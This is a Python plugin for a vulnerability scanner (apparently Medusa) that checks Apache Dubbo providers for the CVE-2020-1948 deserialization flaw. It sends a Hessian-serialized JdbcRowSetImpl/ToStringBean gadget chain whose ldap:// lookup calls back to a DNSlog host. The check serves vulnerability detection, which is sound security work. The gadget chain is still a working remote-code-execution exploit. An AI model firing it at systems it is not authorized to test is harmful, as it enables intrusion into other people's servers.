#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ascotbe'
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling,Proxies,Dnslog,Exploit,ExploitOutput
import urllib3
import time
from dubbo.codec.hessian2 import new_object
from dubbo.client import DubboClient
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2020-1948" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2020-7-3"  # 插件编辑时间
        self.info['disclosure'] = '2020-06-23'  # 漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "DubboProviderDefaultAntiSequenceVulnerability"  # 插件名称
        self.info['name'] ='DubboProvider默认反序列漏洞' #漏洞名称
        self.info['affects'] = "Dubbo"  # 漏洞组件
        self.info['desc_content'] = "ApacheDubboProvider存在反序列化漏洞，攻击者可以通过RPC请求发送无法识别的服务名称或方法名称以及一些恶意参数有效载荷，当恶意参数被反序列化时，可以造成远程代码执行。"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['version'] = "Dubbo2.7.0-2.7.6\r\nDubbo2.6.0-2.6.7\r\nDubbo2.5.x(官方不再维护)"  # 这边填漏洞影响的版本
        self.info['suggest'] = "升级最新Dubbo版本"  # 修复建议
        self.info['details'] = Medusa  # 结果



def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        DL=Dnslog()
        client = DubboClient(url, int(port))

        JdbcRowSetImpl = new_object(
            'com.sun.rowset.JdbcRowSetImpl',
            dataSource="ldap://"+DL.dns_host(),
            strMatchColumns=["foo"]
        )
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object(
            'com.rometools.rome.feed.impl.ToStringBean',
            beanClass=JdbcRowSetImplClass,
            obj=JdbcRowSetImpl
        )

        resp = client.send_request_and_return_response(
            service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # 此处可以是 $invoke、$invokeSync、$echo 等，通杀 2.7.7 及 CVE 公布的所有版本。
            method_name='$invoke',
            args=[toStringBean])
        time.sleep(3)
        if DL.result():
            Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url,DL.dns_text(),DL.dns_host(),str(resp))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # 调用写入类传入URL和错误插件名
